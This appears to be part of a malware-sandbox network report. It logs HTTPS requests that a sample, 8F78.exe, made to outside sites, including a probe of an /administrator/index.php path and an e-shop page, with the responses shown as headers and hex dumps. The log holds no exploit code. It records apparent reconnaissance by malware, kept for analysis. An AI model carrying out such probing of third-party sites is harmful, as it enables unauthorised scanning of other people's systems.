                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC1369INData Raw: 69 66 2d 6c 22 3e 53 65 65 20 64 65 74 61 69 6c 73 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 72 65 64 69 74 69 20 22 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 33 30 64 61 79 73 6d 61 6c 6c 69 63 6f 2e 70 6e 67 22 20 61 6c 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 3e 33 30 2d 64 61 79 20 6d 6f 6e 65 79 20 62 61 63 6b 20 67 75 61 72 61 6e 74 65 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63
                                                                                                                                                                                                                                                                                                                                Data Ascii: if-l">See details</a></div><div class="crediti "><ul><li><div class="img"><img src="https://static.HugeDomains.com/images/hdv3-img/30daysmallico.png" alt></div><div class="content"><span>30-day money back guarantee</span></div></li><li><div c
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC1369INData Raw: 6c 2e 63 6f 6d 3c 2f 68 31 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 64 2d 74 2d 6e 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 73 61 6c 65 3a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 32 2c 32 39 35 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 73 22 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 42 75 79 20 6e 6f 77 20 66 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 32 2c 32 39 35 3c 2f 73 70 61 6e 3e 20 6f 72 20 70 61 79 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 31 39 31 2e 32 35 3c 2f 73 70 61 6e 3e 20 70 65 72 20 6d 6f 6e 74 68 20 66 6f 72 20 31 32
                                                                                                                                                                                                                                                                                                                                Data Ascii: l.com</h1><p class="d-t-n">This domain is for sale: <span class="green">$2,295</span></p></div><div class="tablet-block-s"><p class="text-center">Buy now for <span class="green">$2,295</span> or pay <span class="green">$191.25</span> per month for 12
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC1369INData Raw: 32 35 70 78 3b 22 3e 0a 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 22 3e 6f 72 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 72 69 67 68 74 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 70 61 79 6d 65 6e 74 2d 70 6c 61 6e 2d 73 65 74 75 70 2e 63 66 6d 3f 64 3d 48 6f 6b 61 6c 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 30 70 78 3b 20 77 69 64 74 68 3a 32 34 37 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 32 34 37 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 20 22 20 69 64 3d 22 68 64
                                                                                                                                                                                                                                                                                                                                Data Ascii: 25px;"><span style="font-size:16px;">or</span></div><div class="tablet-block-right"><a href="https://www.HugeDomains.com/payment-plan-setup.cfm?d=Hokal.com" class="btn" style="padding-right:30px; width:247px; min-width:247px; margin-top:10px; " id="hd


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                102192.168.2.455770104.26.6.374435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC199OUTGET /domain_profile.cfm?d=hokal.com HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.hugedomains.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC800INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:31 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                cache-control: private
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                set-cookie: site_version_phase=108; expires=Sun, 15-Dec-2024 04:03:31 GMT; path=/
                                                                                                                                                                                                                                                                                                                                set-cookie: site_version=HDv3; expires=Sun, 15-Dec-2024 04:03:31 GMT; path=/
                                                                                                                                                                                                                                                                                                                                x-powered-by: ASP.NET
                                                                                                                                                                                                                                                                                                                                lb: TclPrdLbHd3
                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=i9hhFZST%2BiSwK%2FFs3C%2FVf47vgTCzUFAR5aSJYAaIeUBn8A9liK62X5T8IDy1Etk%2Bbf8OGGmPa2WtvWK39OtftL2%2FHQloNffh9xw8axWAAI4bdVOr5vXdlwDGncLLoXCnEBz2Tyc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                CF-RAY: 838d3c576fb69ae6-MIA
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC569INData Raw: 39 30 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74
                                                                                                                                                                                                                                                                                                                                Data Ascii: 90e<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><met
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC1369INData Raw: 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 62 6f 6f 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f
                                                                                                                                                                                                                                                                                                                                Data Ascii: " /><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/reboot.min.css"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC387INData Raw: 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 7a 79 77 36 6d 64 73 2e 63 73 73 22 3e 0a 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0d 0a 67 74 61 67 28 27
                                                                                                                                                                                                                                                                                                                                Data Ascii: rel="stylesheet" href="https://use.typekit.net/zyw6mds.css"><script async src="https://www.googletagmanager.com/gtag/js?id=UA-7117339-4"></script><script>window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}gtag('
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC1369INData Raw: 31 31 36 61 0d 0a 72 73 69 6f 6e 27 0d 0a 7d 0d 0a 7d 29 3b 0d 0a 67 74 61 67 28 27 65 76 65 6e 74 27 2c 20 27 70 61 67 65 4c 6f 61 64 27 2c 20 7b 20 27 73 69 74 65 76 65 72 73 69 6f 6e 27 3a 20 27 48 44 76 33 27 20 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 68 72 65 66 3d 22 23 6d 61 69 6e 22 20 63 6c 61 73 73 3d 22 73 6b 69 70 2d 6d 61 69 6e 22 3e 53 6b 69 70 20 74 6f 20 6d 61 69 6e 20 63 6f 6e 74 65 6e 74 3c 2f 61 3e 0a 3c 68 65 61 64 65 72 20 69 64 3d 22 68 65 61 64 65 72 22 20 63 6c 61 73 73 3d 22 68 64 76 33 48 65 61 64 65 72 44 61 72 6b 42 6c 75 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 73 2d 6f 76 65 72 6c 61 79 2d 6d 6f 64 61 6c 20 6f 76 65 72 6c 61 79 2d 6d 6f 64 61 6c 22 3e 3c 2f
                                                                                                                                                                                                                                                                                                                                Data Ascii: 116arsion'}});gtag('event', 'pageLoad', { 'siteversion': 'HDv3' });</script></head><body><a href="#main" class="skip-main">Skip to main content</a><header id="header" class="hdv3HeaderDarkBlue"><div class="js-overlay-modal overlay-modal"></
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC1369INData Raw: 64 65 72 20 44 6f 6d 61 69 6e 20 53 65 61 72 63 68 22 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 76 61 6c 75 65 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 6f 6e 43 6c 69 63 6b 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 53 75 62 6d 69 74 46 75 6e 63 28 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 20 22 20 73 74 79 6c 65 3d 22 6d 69 6e 2d 77 69 64 74 68 3a 39 30 70 78 3b 20 68 65 69 67 68 74 3a 33 35 70 78 3b 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 42 75 74 74 6f 6e 49 44 22 3e 53 65 61 72 63 68 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 76 61 6c 75 65 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 50 72
                                                                                                                                                                                                                                                                                                                                Data Ascii: der Domain Search"><button type="submit" value class="search-btn" onClick="hdv3HeaderSearchSubmitFunc(); return false; " style="min-width:90px; height:35px;" id="hdv3HeaderSearchButtonID">Search</button><button type="button" value id="hdv3HeaderSearchPr
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC1369INData Raw: 6e 6b 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6e 64 65 78 2e 63 66 6d 22 3e 48 6f 6d 65 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 66 61 71 2e 63 66 6d 22 3e 46 41 51 73 3c 2f 62 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 61 62 6f 75 74 2e 63 66
                                                                                                                                                                                                                                                                                                                                Data Ascii: nk " href="https://www.HugeDomains.com/index.cfm">Home</a></li><li class="nav-item"><a class="nav-link " href="https://www.HugeDomains.com/faq.cfm">FAQs</b></a></li><li class="nav-item"><a class="nav-link " href="https://www.HugeDomains.com/about.cf
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC359INData Raw: 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6d 61 69 6e 20 22 3e 0a 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 64 75 63 74 2d 66 61 76 2d 77 72 61 70 70 20 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 64 65 2d 77 72 61 70 70 20 64 6e 2d 6d 6f 62 69 6c 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6c 69 64 65 2d 73 69 64 65 62 61 72 2d 62 6c 6f 63 6b 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 73 2d 62 6c 6f 63 6b 2d 69 6e 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 73 2d 62 6c 6f 63 6b 2d 69 6e 6e 65 72 2d 6e 65 77 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 73 2d 62 6c 6f 63 6b 2d 74 69 74 6c 65 20 67 72 65 65 6e 22 3e 48 6f 6b 61 6c 2e 63 6f 6d 3c 2f 73 70 61 6e 3e 0a 3c
                                                                                                                                                                                                                                                                                                                                Data Ascii: <main class="site-main "><div class="product-fav-wrapp container"><div class="side-wrapp dn-mobile"><div class="slide-sidebar-block"><div class="ss-block-inner"><div class="ss-block-inner-new"><span class="ss-block-title green">Hokal.com</span><
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC1369INData Raw: 37 66 66 61 0d 0a 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 63 66 6d 3f 64 3d 48 6f 6b 61 6c 26 65 3d 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 6d 2d 62 2d 30 20 6d 2d 74 2d 30 20 22 20 69 64 3d 22 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 49 44 22 20 6f 6e 43 6c 69 63 6b 3d 22 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 49 44 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 64 65 6e 41 74 4c 6f 61 64 27 29 3b 20 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 50 72 6f 63 65 49 44 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 68 69 64 64 65 6e 41 74 4c 6f 61 64 27 29 3b 20 6c
                                                                                                                                                                                                                                                                                                                                Data Ascii: 7ffa<a href="https://www.HugeDomains.com/shopping_cart.cfm?d=Hokal&e=com" class="btn m-b-0 m-t-0 " id="hdv3Billboard197BuyID" onClick="$('#hdv3Billboard197BuyID').addClass('hiddenAtLoad'); $('#hdv3Billboard197BuyProceID').removeClass('hiddenAtLoad'); l
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC1369INData Raw: 2d 62 74 6e 20 70 61 79 6d 65 6e 74 70 61 79 2d 61 63 63 61 75 6e 74 2d 63 6f 6e 74 65 6e 74 2d 62 74 6e 20 62 74 6e 20 68 69 64 64 65 6e 41 74 4c 6f 61 64 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 32 37 33 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 35 70 78 3b 20 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 22 3e 50 72 6f 63 65 73 73 69 6e 67 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: -btn paymentpay-accaunt-content-btn btn hiddenAtLoad" onclick="return false;" style="height:50px; margin-left:0px; min-width:273px; margin-top:0px; margin-bottom:25px; display:flex;">Processing<div class="circularJ"><div class="circularJ_1"></div><div
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC1369INData Raw: 64 3d 22 70 6f 73 74 22 20 69 64 3d 22 6c 61 6e 64 65 72 46 6f 72 6d 44 45 32 33 34 42 34 35 33 34 33 42 34 33 45 45 38 45 44 35 41 30 36 34 33 32 38 34 33 32 42 34 49 44 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 63 61 72 74 43 68 65 63 6b 22 20 76 61 6c 75 65 3d 22 30 22 20 69 64 3d 22 6c 61 6e 64 65 72 46 6f 72 6d 44 45 32 33 34 42 34 35 33 34 33 42 34 33 45 45 38 45 44 35 41 30 36 34 33 32 38 34 33 32 42 34 43 68 65 63 6b 49 44 22 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 6c 61 6e 64 65 72 46 75 6e 63 44 45 32 33 34 42 34 35 33 34 33 42 34 33 45 45 38 45 44 35 41 30 36 34 33 32 38 34 33 32 42 34 46 75 6e 63 28 29 20 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 67 65 74
                                                                                                                                                                                                                                                                                                                                Data Ascii: d="post" id="landerFormDE234B45343B43EE8ED5A064328432B4ID"><input type="hidden" name="cartCheck" value="0" id="landerFormDE234B45343B43EE8ED5A064328432B4CheckID"></form><script>function landerFuncDE234B45343B43EE8ED5A064328432B4Func() {document.get


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                103192.168.2.45568923.239.22.2024435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC184OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: aexoden.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC278INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:31 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.10
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15724800; includeSubdomains
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC27INData Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 10File not found.0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                104192.168.2.45570037.9.175.1804435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC164OUTGET /eshop HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kanapy.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC211INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:31 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Content-Length: 232
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://kanapy.sk/eshop/
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC232INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 61 6e 61 70 79 2e 73 6b 2f 65 73 68 6f 70 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://kanapy.sk/eshop/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                105192.168.2.45568837.9.175.1804435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC164OUTGET /eshop HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kanapy.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC211INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:31 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Content-Length: 232
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://kanapy.sk/eshop/
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC232INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 61 6e 61 70 79 2e 73 6b 2f 65 73 68 6f 70 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://kanapy.sk/eshop/">here</a>.</p></body></html>


